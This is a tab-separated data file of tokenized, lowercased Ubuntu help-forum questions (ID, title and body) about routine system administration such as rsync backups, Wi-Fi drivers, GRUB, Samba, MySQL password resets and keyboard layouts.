489006	full rackspace cloud server backup to local	i want to rsync my entire rackspace cloud server disk to a local drive . the command i am currently using is : rsync -- dry-run -- archive -- xattrs -- compress -- partial -- progress -- exclude= { /proc/* , /sys/* , /tmp/* , /run/* , /mnt/* , /media/* , /lost+found } / user @ remote_server : /backup_dir i figure i should not exclude /dev/ because my root partition is on /dev/xvda1 . however , when i run this , i get no output and it exits immediately . the exit code ( checked with echo $ ? ) is 0 . what could be going on ? also : if there is a better way to do this , or more appropriate command line flags , do tell me .
489009	how can i edit or create a new dictionary for spellcheck ?	i would like to take my american english dictionary and merge it with my mexican spanish dictionary , to create the language i actually use on a daily basis , which is spanglish . this way i wo n't have to bother switching dictionaries when i switch languages mid-email , which i sometimes do . how does ubuntu store languages ? is it different from how firefox does so , or do they share a file ? how can i edit these files so that i can do my merge ? muchas gracias !
489012	nvidia - enable threaded optimisation	i often see people write how enabling `` threaded optimization '' in the nvidia control panel ( on windows ) can improve performance in certain situations . however i ca n't seem to find that option in the nvidia settings on ubuntu . are there other ways to enable threaded optimization ?
489013	removed a partition with gparted . ubuntu still tries to mount it	this is my problem . when i installed my ubuntu 14.04 partition coming back from windows 7 , i decided to leave my games partition alone and have it be there . i then realized having a root partition , a /home partition and a 300gb gaming partition was not a great idea seeing as the puny 80gb /home partition got used up fast enough with mkv files . i then booted into a gparted disc , removed the /mnt/games partition and made the /home partition 300gb bigger . now , ubuntu always tries to mount it at boot ( i had it automount on boot ) and gives me an error every time i boot up . how do i go by fixing this . thanks in advance .
489016	how do i get rid of old encrypted home folder ?	the encrypted home folder is taking up a lot of space . it 's a home folder of an account before i updated via usb , i 've copied all the files over from it and i need to know how to delete it , thanks ! : )
489019	how to add memory or delete files to \boot volume ?	i have only 6 free mb on `` boot volume '' . how can i find for not-used files to remove ? or is it possible to add memory to this unit ?
489022	ubuntu 12.04 lts unable to boot - no bootable device	i have computer that was configured to dual boot ubuntu 12.04 lts and windows 8 . when the computer was rebooted afte shut down the computer fails with following errors checking media = failed no bootable device - please restart before shuting down by mistake i wrote to ( dd ) /dev/sda thinking it was the sd card drive . is there anything that i can do to recovery with out reinstalling everything all over again . the data was backuped up a few weeks ago . any thoughts .
489024	cant install ubuntu 12.04 , select cd-rom boot type	i 'm having trouble installing ubuntu 12.04 from boot disk on a friends computer . when starting the computer with boot disk the message appears : 1 . 2 . select cd-rom boot type : if i enter 1 it goes to starting windows screen and boots 7 as normal if i enter 2 it goes to a screen with a blinking dash in the top left corner for a minute or two then goes to the starting windows screen and loads 7 as normal
489029	how can i set the maas network adaptor to do nat on ubuntu 14.04 ?	how can i set the maas network adaptor to do nat on ubuntu 14.04 ? do i need to config nat on router ? do i need any specific router for nat ?
489031	choosing a source for update	how can i choose the address http : //ir.archive.ubuntu.com/ for ubuntu update and package download ?
489032	partial ( specific releases ) mirror of ubuntu archive via rsync only	i 'm looking to build a ubuntu repository archive for both i386/x64 architectures on 12.04 ( precise ) . this is to bring in to a facility where i am working with no internet connection . circumstances limit my ability to do this from a full linux machine - i just have the rsync tool available and a 1tb external hard drive . debmirror is not a viable option . i can run rsync -a -- progress rsync : //mirror.symnds.com/ubuntu/ /volumeusb1/usbshare/mirror/ubuntu and while this accomplishes what i need , it does so for every release that is still supported . i only need packages related to 12.04 ( precise ) . is there an easy way to modify the rsync command so that i get only the repositories that i need from 12.04 while keeping in place all the structure i need for the mirror to work once connected back to the ubuntu machine ? bonus points for multiple commands that i could execute in parallel to ( hopefully ) speed up the download process .
489036	what is the meaning of `ppa : x/y`	i know how to add a ppa to ubuntu . but i do n't know what this ppa : x/y ppa format means ! for instance : # ( vlc ppa ) sudo add-apt-repository -y ppa : videolan/stable-daily what is videolan and what is stable-daily ?
489046	how in install all debian files in a folder except older versions	in a folder there are debian files for different packages which were originally downloaded by sudo apt-get . i want to install all of then in another ubuntu system . the problem is that there may be both newer and older version of the same package in the folder . how can i install all packages in the folder except those for which there is a newer version in it ?
489048	wireless and sound not responding	problem 1 i just got my new laptop , dell inspiron 3537 , with ubuntu 12.04 and had great enthusiasm . when i first opened the laptop i connected to my wireless network with no problem . but soon as i downloaded some updates my wireless did not work any more and i can not find any wireless network since then ! i can connect to the internet with a cable though . problem 2 today one week after i bought my laptop the sound keys do n't work and also i ca n't listen to music from the internet . what do i need to do to fix this problem ? help is needed so i can do my work ...
489050	sudo sh -c ‘echo “deb http : //archive.canonical.com/ubuntu trusty partner” > > /etc/apt/sources.list.d/canonical_partner.list’ not woking	i 'm trying to skype on ubuntu 14.04 , but when i type : sudo sh -c ‘echo “deb http : //archive.canonical.com/ubuntu trusty partner” > > /etc/apt/sources.list.d/canonical_partner.list’ it says `` permission denied . '' please help , or tell me another way to get skype .
489052	mysql does n't install correctly	i recently reset my computer , and when i installed lamp server sudo apt-get install lamp-server^ then i installed apache2 sudo apt-get install apache2 and then mysql server ... sudo apt-get install mysql-server ... client ... sudo apt-get install mysql-client ... common ... sudo apt-get install mysql-common then i run this command to start mysql mysql and i get a missing socket error . i am certain i did something wrong in the installation . any help is appreciated .
489059	terminal commands not recognized as an internal or external command	i tried : startx and it did n't work saying : startx is not recognized as an internal or external command and tried : sudo apt-get install ubuntu-desktop but i get : sudo is not recognized as an internal or external command then i tried : removing sudo and again showed : apt-get is not recognized as an internal or external command
489062	can not access 14.04 using ssh/scp ?	when i tried to access my ubuntu using ssh or scp from other os , i can not access , same as i put correctly password root . see the file below if i use ssh appear the same problem ... how can i fix this problem ?
489065	any interface for building a server in linux xubuntu . ( not desktop )	is there any interface or program that i could install on my linux xubuntu that would help me set up a server using the terminal as little as possible ?
489072	how to remap keyboard shortcuts for ctrl+c & ctrl+v on xubuntu 14.04 ?	i was wondering if it 's possible to remap the keyboard shortcuts for ctrl+c & ctrl+v on xubuntu 14.04 ? i could n't find anything in settings manager - > settings editor - > xfce4-keyboard-shortscuts nor in settings manager - > keyboard - > application shortcuts . is there maybe a workaround to reassign the copy and paste keyboard shortcuts to a different one ? thanks in advance !
489073	is there any way to install windows 8 without touching ubuntu partitions ?	recently i bought too many windows games so i decided to get back my windows 8 just for fun . but then i discovered that it ca n't be installed into ubuntu partitions sice they 're not ntfs and the only way is to delete those partitions if i want to install windows . of course i could delete those , install windows and the reinstall ubuntu , but i do n't want to lose all my data .
489076	internal hd with w8 ca n't boot after install ubuntu 14.04 in external hd	i currently have 2 hd one internal with w 8.1 and a external one , and i decide to move to ubuntu 14.04 , i install ubuntu in the external hd ( 1tb ) , i made the partitions ( swap , boot , / & /home ) . after the installation i can boot with any issue in the external hd , but when i try to enter in w8 the system just get me in the bios config everytime . so this happens , if i boot from the external hd i can enter in the grub an see the `` w8 loader '' after clicking in it i see this message `` error : no such partition '' if tried to boot normally ( without the external hd connected ) i go into the bios when im into ubuntu o can see my internal hd and i can move file form there to any directorie on my ubuntu . ineed w8 for some work so i really need recover the partition or the boot system , idk exactrly what happens . p.s . i tried w fix mbr and nothing some ss if helps : p https : //www.dropbox.com/s/9uxh476wvua8su2/screenshot % 20from % 202014-06-27 % 2006 % 3a03 % 3a20.png https : //www.dropbox.com/s/eyjq3g33v6gbql2/screenshot % 20from % 202014-06-27 % 2006 % 3a06 % 3a27.png
489078	locked settings on ubuntu 14.04	i ca n't change any of the settings under ubuntu 14.04 , even add an icon from the launcher . always on the default settings . this happens after upgrading . i 'm new to the ubuntu system so restart is my only option .
489082	power settings location ?	i have xubuntu 14.04 and i am running it on an eeepc . where in the world are my power settings ? i 've looked everywhere . i found this in my files , but i do n't know how to open/use/install it . /usr/share/locale/sk/lc_messages/xfce4-power-manager.mo
489083	dvd / cr drive not found after 14.04 install	my dvd/cd drive ( lightscribe super multi 8x dvdâąr/rw with double layer support ) which worked on windows , does not play or read anything once ubuntu 14.04 was installed . i see it in the bios , shows an led and it spins up when a disc is inserted but can not be read or played . there is no cdrom or dvdrom folder under /dev/ . i see a /cdrom folder in the root but it is empty and /mnt folder is also empty . i am new to linux so will need basic instructions for any suggestions anyone may have . i have tried many things found in askubuntu but still not showing up in /dev or /mnt , wo n't autoplay any type of disc and vlc does not play or read them either . some things i remember are ; setting the region , manually mounting the device ( not found ) , installed cdde ( app ) , installed restricted codecs and reinstalled udisks . vlc errors are : playback failure : dvdread could not open the disc `` /dev/sr0 '' . your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///dev/sr0 ' . check the log for details . mount | grep ^'/dev ' returns the following : /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) here is the link to my laptop product specs : http : //h10025.www1.hp.com/ewfrf/wc/document ? docname=c01411391 & tmp_task=prodinfocategory & cc=us & dlc=en & lang=en & lc=en & product=3689897 i do n't know how to query the system for other information so let me know how to get anything else that is needed . any help would be appreciated .
489084	ca n't get virtual host working	i have 3 drupal sites working on my local dev box ubuntu 14.04 . i had problems getting the second and third ones working and when they did it just seemed like luck . those 3 kept me going for a long time but now i need a fourth and i ca n't get it working . here is my process for creating a site put drupal files in folder ~/workspace/sitedemo1 create virtual host sitedemo1.conf ( copy one of the working ones and then edit relevant details ) edit /etc/ports - enter `` 127.0.0.1 sitedemo1 '' a2ensite sitedemo1 service apache2 reload the result is that i get the 'apache2 ubuntu default page' i 'm pretty confused because the other 3 sites are working and i did the same thing . sitedemo1.conf < virtualhost *:80 > serveralias sitedemo1 documentroot /home/karl/workspace/sitedemo1 < directory `` /home/karl/workspace/sitedemo1 '' > options followsymlinks allowoverride all require all granted < /directory > < /virtualhost > above i mixed-up /etc/hosts and /etc/apache2/ports.conf . here is the contents of both . /etc/apache2/ports.conf # original line : listen 80 listen 127.0.0.1:80 listen 127.0.0.2:80 < ifmodule ssl_module > listen 443 < /ifmodule > < ifmodule mod_gnutls.c > listen 443 < /ifmodule > # vim : syntax=apache ts=4 sw=4 sts=4 sr noet /etc/hosts 127.0.0.1 localhost 127.0.1.1 ubuntu-05 127.0.0.1 drupal-8.localhost 127.0.0.1 drupal-7-site01.localhost 127.0.0.1 drupal-7-site02.localhost 127.0.0.1 sitedemo1 # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
489085	why are the colors different in vi at the console vs in a windows telnet session	i noticed that when i use vi at the console , the code highlighting looks good and is nice and easy to read . when i edit the same file via a telnet session , the colors are all low-intensity and it 's impossible to read . anyone know what is causing that ? thanks ! update : windows telnet - sorry i did n't specify that earlier - subject updated accordingly
489086	configure junos pulse in ububtu	could any one please tell me the correct procedure for configuring junos pulse in ubuntu 14.04 ? i successfully installed java in my system : indmaxadmin @ indmaxadmin : ~ $ java -version java version `` 1.6.0_31 '' openjdk runtime environment ( icedtea6 1.13.3 ) ( 6b31-1.13.3-1ubuntu1 ) openjdk server vm ( build 23.25-b01 , mixed mode ) and i do n't know how to set the home folder . i also do n't know what version of java i need for junos pulse .
489087	wifi wo n't stay conneted after upgrade	02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) wo n't stay connected toshiba satellite please help i have to reboot to get connected again it 's a real pain !
489088	read only + browseable issue : configured in smb.conf - not showing in testparm	i 'm trying to setup a public share with samba so i can stream my music files from my ubuntu 14.04 server to my sonos soundsystem . been trying to crack this one for a couple of hours , but unfortunately no success . i 've set the following share in smb.conf : [ global ] security = user map to guest = bad user guest account = nobody ; interfaces = lo p2p1 ; bind interfaces only = true [ public ] comment = public share path = /export/storage browseable = yes read only = yes guest only = yes guest ok = yes the output in testparm looks good at first sight , but both the browseable & read only setting are n't visible : [ global ] server string = % h server ( samba , ubuntu ) server role = standalone server map to guest = bad user obey pam restrictions = yes pam password change = yes passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 dns proxy = no usershare allow guests = yes panic action = /usr/share/samba/panic-action % d idmap config * : backend = tdb > > > not using printers / nor touched the settings , hence the skip < < < [ public ] comment = public share path = /export/storage guest only = yes guest ok = yes -- -- -- end -- -- -- - basically , both the browseable = yes and read only = yes are n't showing up . have a funny feeling that this is causing my other devices in the network not being able to connect to the samba share directory . more specifically , i can add smb : //192.168.0.xxx/export/storage and my mac will recognize the server and try to connect . but when i try to login as a guest user , it does n't make the connection and tells me to contact the system administrator , which is funny in its own way ... ; - ) tried to connect with other devices and have the same problem . on a foot note , set up a nfs server earlier today and have no problems whatsoever connecting devices to the same 'shared ' directory . really struggling with this one , any help or point into the right direction is much appreciated .
489089	ca n't cd to any directory inside home when using rbash	i just set a user to use rbash ( i wanted to user to be able to access it 's home directory only ) . however when i try to change sub-directory it always gives me : -rbash : cd : restricted the sub-directory owner is this logged in user , so i do n't know why it is restricted . any idea/help ?
489090	where does 14.04 keep its appearance wallpaper ?	and how do i add images to that location ? some 'net site ( i ca n't remember which one ) said it was in /usr/share/backgrounds , but , though i have a long list of images in that folder , they do n't show up in the appearance utility 's display of wallpapers . why ? as my subject said , where does 14.04 store them , and how do i add images to that display ?
489095	lock screen password misses first character in 14.04	i am running ubuntu 14.04 ( 64 bit ) . in my previous ubuntu , which was 12.04 , when the screen was locked and the monitor went blank , i just typed the password and hit enter . even though everything looked blank , it worked in the background and unlocked the screen . however , in 14.04 , when i directly type the password from the lock screen ( with the monitor out ) , often times it misses the first character and obviously tells me that the password is wrong . so now i have to type the first character , wait a bit for the screen to come up and see if it was registered , and then type the rest of the password depending on that . not that big of an issue , but for someone who locks the screen almost every time he leaves the pc , it 's a little annoying . any way to fix this ?
489097	ubuntu password	i just got a computer from a friend of a friend . it has ubuntu and an unauthorized version of windows xp loaded on it . i want to be able to eventually get online with the computer ; however , when it boots up i am prompted to pick the operating system ( either ubuntu or windows xp ) . when i pick ubuntu it loads and then prompts me for a password . i can not get past that prompt . please help me get past the password prompt , so i can use ubuntu as my primary operating system . the computer is old ( circa 2008 ) so i am sure the version of ubuntu is very old . thanks in advance . respectfully , matt peoria
489098	unable to reset root password of mysql	i need to reset the root password of my local mysql installation but it woudl n't let me . i 've tried this : $ sudo /etc/init.d/mysql stop * stopping mysql database server mysqld [ ok ] [ 1 ] - exit 1 sudo /usr/sbin/mysqld -- skip-grant-tables -- skip-networking [ 2 ] + exit 1 sudo /usr/sbin/mysqld -- skip-grant-tables -- skip-networking reg @ regdesktophome : ~ $ sudo mysqld -- skip-grant-tables & [ 1 ] 13651 reg @ regdesktophome : ~ $ 140627 19:02:02 [ warning ] using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release . please use the full name instead . reg @ regdesktophome : ~ $ mysql -u root mysql error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) reg @ regdesktophome : ~ $ sudo mysql -u root mysql error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) [ 1 ] + exit 1 sudo mysqld -- skip-grant-tables how can i get the password reset ? edit 1 i got this : $ ps ax| grep mysql 16515 ? ssl 0:00 /usr/sbin/mysqld 16551 pts/23 s+ 0:00 grep -- color=auto mysql reg @ regdesktophome : ~/semios/v3upgrade $ sudo kill -9 16515 reg @ regdesktophome : ~/semios/v3upgrade $ ps ax| grep mysql 16678 ? ssl 0:00 /usr/sbin/mysqld 16715 pts/23 s+ 0:00 grep -- color=auto mysql reg @ regdesktophome : ~/semios/v3upgrade $ mysql -u root error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) looks like a process is automatically restarting mysql as soon as i kill it ...
489099	use login shell in xubuntu 14.04	i installed a fresh vm of xubuntu 14.04 and installed the ruby version manager ( rvm ) . while trying to install the sass gem i get the following error : $ rvm use 2.0 rvm is not a function , selecting rubies with 'rvm use ... ' will not work . you need to change your terminal emulator preferences to allow login shell . sometimes it is required to use `/bin/bash -- login` as the command . please visit https : //rvm.io/integration/gnome-terminal/ for a example . i checked this stackoverflow question and used configured terminator to use a login shell : unfortunately , after doing this new terminals wo n't show the prompt : any ideas why this is not working ?
489105	can you set up parental controls ?	i know this is a rlly dumb question ( sorry ) but is there a way to set up parental controls on my ubuntu 14.04 computer ? thanks in advance
489108	sudden wifi issue with buffer space error	i 've been running 14.04 for a while now and have n't had any major issues . a couple days ago though , my wireless connection started dying on me . i had n't changed anything , so i 'm not sure where this came from . the symptoms are always the same , it connects to the wifi just fine after boot , then dies 5-10 minutes into regular usage . running a constant ping goes from regular responses to `` sendmsg : no buffer space available '' and then to `` sendmsg : network is unreachable '' . i found a few different threads about this and tried a few things , but no change . i 'm using a realtek usb adapter , but the driver version is much newer than one someone listed as problematic . i also tried setting my wireless router to g-mode only , same issue . i only recently made the switch from the `` w '' word to ubuntu , so i 'm not sure where else to look . any ideas ?
489109	packages installed by default on ubuntu cloud image ?	i am running ubuntu in a virtual machine through vagrant using the `` ubuntu/trusty64 '' box . based on the information on https : //vagrantcloud.com/ , this box runs a `` cloud image '' of ubuntu . i 'm having some issues with some private code , and as part of the debugging process , would like to know exactly what packages are on the image , and particularly how the cloud image differs from the ubuntu server and ubuntu desktop . so far , my research has turned up a blog post post from when it first launched stating that the image was `` rather vanilla '' with no further detail . i 've also turned up the following question , which is similar to mine , but was never answered . link . so , what is the differences between ubuntu cloud image and ubuntu server ? thanks , jp
489112	how to create l2tp connection in ubuntu 14.04 x64 ?	i need to use l2tp connection on my ubuntu 14.04 lts x64 . i tried some ways but all of them failed me . is there any way to make it work ? p.s : for test use http : //www.vpngate.net/en/ accoount test
489114	complete removal of all bluetooth related packages	i have a poorly powered netbook and i would like to safely `` trim the fat '' from my 14.04 install . what i 'm looking to do is remove all traces of bluetoothd ( a service that does not seem to want to take `` no '' for an answer when it comes to loading at boot time ) , and all other bluetooth related software . my netbook does n't support bt , and i have no desire to ever use it in the future . i have had little luck finding out if anyone has tried this before , and i would like to be able to have some idea if it is safe to completely purge . your help finding the correct information is appreciated . ask questions if you need to , thanks .
489115	crackling sound after latest update	totally new to ubuntu and linux . installed 14.04 on clean machine about two weeks ago . not much installed but playonlinux ( diablo 3 ) , wine ( diablo 3 ) , gksu , etc . was able to fix audio issues initially by doing step 1b from here : sound troubleshooting procedure . looks like a kernel patch came in this week . something must have gone wrong because on reboot , no dice . no recovery option would successfully boot . so i reinstalled 14.04 again ( erased disk ) can boot , but can not fix audio . tried the step 1b and step 1c from above . crackling is awful ( rhythmbox , youtube , wine especially ) i have run apt-get update tried tsched=0 fix - caused rhythmbox to crash when attempting to play mp3 . tried setting the intel hd model to generic . mobo is ga-z97-hd3 ( has alc887 ) please help .
489116	keyboard shortcuts for switching language input method no longer works after updates	as part of a string of problems with recent updates in gnome flashback ( like this , and this ) , after an update a day or so ago , the shortcut keys i have assigned for switching between japanese and english stopped working . i use ibus and anthy on gnome flashback . i have set the shortcut keys to be ctrl+space , but it does n't respond at all . i have tried changing the keys in the `` text entry settings ... '' interface , but it does n't seem to matter what keys i opt to use . i can still switch input methods by clicking on the applet icon in the gnome panel and selecting from the options that drop down , but when typing a lot and switching constantly , as i am almost always doing , having to do it that way really sucks . how do i get the shortcut keys for switching input methods to work again ?
489119	bluetooth keyboard disconnecting	ubuntu 14.04 i have been having issues with my bluetooth keyboard ( targus bluetooth keyboard ) disconnecting within ten seconds after i stop typing . bluetooth manager still shows the device on the list ( i am able to connect the device initially ) , but it appears to be inactive . it then takes up to thirty more seconds for it to respond to a single button press , and usually does not respond at all . needless to say , this basically renders the keyboard useless and forces me to use a wired keyboard ( which is inconvenient in my case ) . a possibly related issue is that every time the connection is re-established , i receive a message indicating that the keyboard has 0 % battery power . this happens even with brand new batteries . -wifi is operating on the 5ghz band ; the problem persists even when not using the internet . -my bluetooth mouse has not been having this type of issue . -the keyboard seems to function normally with a dell laptop running windows 8 . thank you for your consideration .
489120	ubuntu 14.04 : wireless connected , but i cant surf the web	last week , i installed ubuntu 11.04 side by side to windows 7 and had no problem with surfing the web . yesterday i have installed ubuntu 14.04 lts side by side to windows 7 . before installing it , i have verified that i can connect to my local wireless , and i have even opened some websites as a test . now i can connect to the wireless network ( as the wireless indicator at the top of the screen show ) but when i launch firefox it gives me the following error : firefox ca n't find the server at www.google.com to test if the problem is a firefox problem or a network problem i tried to host google from a terminal host www.google.com i got ; ; connection timed out ; no servers could be reached i have also tried to see if i can connect to the router by using : ping 192.168.2.1 -c3 output : ping 192.168.2.1 56 ( 84 ) bytes of data -- -192.168.2.1 ping statistics -- - 3 packets transmitted , o received , 100 % packet loss , time 1999ms the output of lspci -nn|grep network gives : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) i dont think it is a problem compatability because i was able to connect to the internet using ubuntu 11.04 , and i would like to know how to solve this problem on ubuntu 14.04
489121	how do i set ubuntu as the host grub system ?	i 've installed a couple of other linux distros on my hard drive , and every time i do grub changes to being installed on the latest installed distro . how do i change grub back to being installed/configured on ubuntu ? i want my laptop to boot from `` ubuntu-grub '' and not `` arch-grub '' , `` deepin-grub '' , etc .
489122	netbook wo n't boot to lubuntu gui after using live usb creator programs & setting aside 1gb for persistence	have downloaded and installed lubuntu 14.04 lts , recently ( without persistence ) & it works fine , aside from not saving settings . when i try to download & install the same , with a 1mb set aside for persistence , using the usb creator programs such as unetbootin , i 'm prompted to log-in which i was n't prompted to do w/ my non-persistence-enabled live usb . plus , after a short time , the following text starts cycling through : the previous live usb , i created using one of the live usb creator programs ( without persistence enabled ) went straight to the desktop gui with no log in required . even tried the manual method of formatting & partitioning a separate usb listed here : https : //help.ubuntu.com/community/livecd/persistence # setting_up_your_usb_stick i 'm assuming i only have to do the partitioning & creating the `` casper-rw '' file system parts ? also tried to use iso on an external hd as outlined here but could n't find the hd when trying to point to it w/ the pre-installed , '' create live cd '' program as shown here : http : //www.tuxradar.com/content/how-install-linux-usb-flash-drive # null the limited usb ports on the netbook are the limiting factor holding me back , i suspect . i have to use a usb splitter device & its not externally powered so the netbook ca n't see it . hardware : lenovo ideapad s10 4333-36u netbook intel atom n270 1.6ghz 1gb ddr2 160gb hdd 10.1 '' wsvga windows xp home
489123	problem to connect wifi in 14.04	i upgraded to ubuntu 14.04 and got the related updates . the wifi indicator is missing and i am unable to connect to any new networks . i can connect to the networks i had been connected to previously . also , in system > settings > network > wireless i can not access the settings for a specific wireless network . initially i could see an error while booting : support for cores revisions 0x17 and 0x18 disabled by module param allhwsupport=0 . try b43.allhwsupport=1 and now while booting , i am getting the message : [ 32.694217 ] info @ wl_cfg80211_attach : registered cfg80211 phy when i checked software & updates > additional drivers , i see : using broadcom 802.11 linux inspiron-n5010 : ~ $ lspci -nn | grep 0280 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) inspiron-n5010 : ~ $ rfkill list all 0 : phy1 : wireless lan soft blocked : no hard blocked : no 1 : hci0 : bluetooth soft blocked : yes hard blocked : no network manager seems to be installed : aptitude search network-manager i network-manager - network management framework ( daemon and userspace tools ) p network-manager : i386 - network management framework ( daemon and userspace tools ) p network-manager-dbg - network management framework ( debugging symbols ) p network-manager-dbg : i386 - network management framework ( debugging symbols ) p network-manager-dev - network management framework ( development files ) p network-manager-dev : i386 - network management framework ( development files ) p network-manager-gnome - network management framework ( gnome frontend ) p network-manager-gnome : i386 - network management framework ( gnome frontend ) p network-manager-iodine - network management framework ( iodine plugin core ) p network-manager-iodine : i386 - network management framework ( iodine plugin core ) p network-manager-iodine-gnome - network management framework ( iodine plugin gnome gui ) p network-manager-iodine-gnome : i386 - network management framework ( iodine plugin gnome gui ) p network-manager-openconnect - network management framework ( openconnect plugin ) p network-manager-openconnect : i386 - network management framework ( openconnect plugin ) p network-manager-openconnect-gnome - network management framework ( openconnect plugin gnome gui ) p network-manager-openconnect-gnome : i386 - network management framework ( openconnect plugin gnome gui ) p network-manager-openvpn - network management framework ( openvpn plugin core ) p network-manager-openvpn : i386 - network management framework ( openvpn plugin core ) p network-manager-openvpn-gnome - network management framework ( openvpn plugin gnome gui ) p network-manager-openvpn-gnome : i386 - network management framework ( openvpn plugin gnome gui ) i network-manager-pptp - network management framework ( pptp plugin core ) p network-manager-pptp : i386 - network management framework ( pptp plugin core ) i network-manager-pptp-gnome - network management framework ( pptp plugin gnome gui ) p network-manager-pptp-gnome : i386 - network management framework ( pptp plugin gnome gui ) p network-manager-strongswan - network management framework ( strongswan plugin ) p network-manager-strongswan : i386 - network management framework ( strongswan plugin ) p network-manager-vpnc - network management framework ( vpnc plugin core ) p network-manager-vpnc : i386 - network management framework ( vpnc plugin core ) p network-manager-vpnc-gnome - network management framework ( vpnc plugin gnome gui ) p network-manager-vpnc-gnome : i386 - network management framework ( vpnc plugin gnome gui ) but inspiron-n5010 : ~ $ sudo nm-applet gives sudo : nm-applet : command not found please let me know how to fix this . thank you !
489126	understanding about lsb checking in 12.04	i saw answers about the question , does ubuntu follow the linux standard base ( lsb ) ? but i could not get exactly answers i need . i run lsb ( verion 4.0 ) checker in ubuntu12.04 4 lts by the way , it shows me as following result . what is it ? is it the problem of lsb checker ? or of ubuntu12.04 4 lts ? or i may do n't understand it completely . how do i understand it ?
489128	ubuntu 12.04 - upgraded to php5.4 - error on php suhosin	i have a linode vps with ubuntu 12.04 . i had php5.3.10 installed and i just upgraded to php5.4.30 - by following the instructions given at http : //www.dev-metal.com/how-to-install-latest-php-5-4-x-on-ubuntu-12-04-lts-precise-pangolin/ everything is all good , except , i must have had php-suhosin installed ( i ca n't remember , but when i was setting up linode , it recommended me to do so ) and now i 'm getting the following message . php warning : php startup : unable to load dynamic library '/usr/lib/php5/20100525/suhosin.so ' - /usr/lib/php5/20100525/suhosin.so : can not open shared object file : no such file or directory in unknown on line 0 i tried apt-get install php5-suhosin but i 'm getting the following packages have unmet dependencies : php5-common : conflicts : php5-suhosin but 0.9.33-1 is to be installed php5-suhosin : depends : phpapi-20090626 e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . how can i resolve this issue ?
489130	keys behaving unusual after kernel update	i 'm using hcl notebook 39 series with ubuntu 14.04 lts . after a kernel update my keyboard is behaving unusual , like : no fn key fn as ctrl del as insert pause as del i also tried to change layouts but nothing happened . please help to revert back to normal functions of keyboard .
489134	windows incorrect , ubuntu truthful ( megabytes/mebibytes )	( seeing as this is askubuntu and not ramble ramble blogspot , the question comes at the end , i 'm just laying down the foundation at the beginning , so just bear with me ) when you get into it , you gradually get obsessive compulsive disorder . numbers must be correct and paintings must be straight . in windows , when i want 1g of partition space i will tell it to use 1024mb , which in-turn becomes 1000mb . in ubuntu , you type 1000mb , and you 'll get exactly 1000mb . the thing is , i grew up with windows , so i seriously believed that 1024 bytes equalled 1000 bytes because of the whole binary business . you know , 2 , 4 , 8 , 16 , 32 , 64 , etc . it only came to my attention that for all these years , someone working in microsoft was constantly telling windows to display the incorrect term . when you click on a hard drive in windows , let 's say it 's 320 gigabytes , it 'll show up in windows as 305gb . and for years it diploma people above me stated , `` oh , that 's just system overhead , that 's why it looks smaller '' i only just figured out that this is , in fact , wrong . windows , for god knows how long , ( i went through xp , vista , 7 , and even 8.1 ) is actually using mebibytes and gibibytes , but displaying the incorrect terms , mb and gb , which should be mib and gib . 320 gigabytes = 305.17578125 gibibytes < -- this is what windows is showing . when i first used ubuntu 14.04 , i made a swap partition of 1024mb , later finding out that ubuntu literally gave me 1024mb of swap space , and in my ocd ways i wanted 1gb . i redid the partitions , creating a 1gb swap space , and in return ubuntu said that i have 953.67431640625 mib of swap space , which is the correct size and term . my question is , how many people using ubuntu actually know of this ? i 've looked up articles over the years , one example is how to make a ramdisk using the ramfs and tmpfs commands . most , if not all of the articles all over the internet , especially ones specializing in linux distros , will use terms such as , `` mount -t tmpfs -o size=512m tmpfs /mnt/ramdisk '' does `` 512m '' in that command actually equal 500mb , or has windows ruined everything with years of being wrong , and everyone now has a habit of using the wrong term ?
489136	ubuntu 14.04 install using wubi on windows 8.1 no preinstall	i have dell laptop on which i have installed windows 8.1 . it is not pre-installed setup but i have later upgraded my windows to 8.1 version from 7- > 8- > 8.1 . i was able to install ubuntu 12.04 using wubi ( because i do n't have that secure boot or uefi stuff ) and it is working great . but now i want to install ubuntu 14.04 , however upon trying to install , it did not show me the menu and directly went to this page ( window ) . how can i force it to install with 14.04 because i know it works perfectly atleast on my computer .
489140	wanted to install win 7 using virtual box on ubuntu 14.04	i would like to install win 7 using virtual box on ubuntu 14.04 . i do n't have optical drive in my system so i m using bootable pen drive of win 7 .
489142	can not connetac to wifi with lenovo g510 wireless under ubuntu	my laptop model is lenovo g510 which is not able to detect wireless . when i output of ifconfig -a i can not see any wireless such as wlan . my ubuntu version is 14.04 . how can i install the driver and resolve the problem ?
489144	create wifi hotspot using a hspa dongle	i have 12.04 ( lts ) i know how to create a wifi hotspot using a wired connection . but when i create the hspa dongle , the connection is created using an external application and does n't use eth0 or the wifi adapter . so i am not sure how to create a wifi hotspot using the dongle ?
489145	converting pdf in taml language to epub using calibre	i have tried to convert a pdf in tamil language using calibre . the conversion took place but the fonts are not in tamil . is it possible to convert pdf in tamil language to convert to epub ? or is there any other software in ubuntu for this purpose ?
489154	change keyboard layout in gdm	i just installed ubuntu-14.04 , and during installation i chose two keyboard layouts : en-us and ru-ru , and created user with en-us login/password . it successfully installed . when it loads the login window there is only one ru-ru keyboard layout , there is no en-us and i ca n't login with my en-us login/passsword . how can i fix this ? thank you .
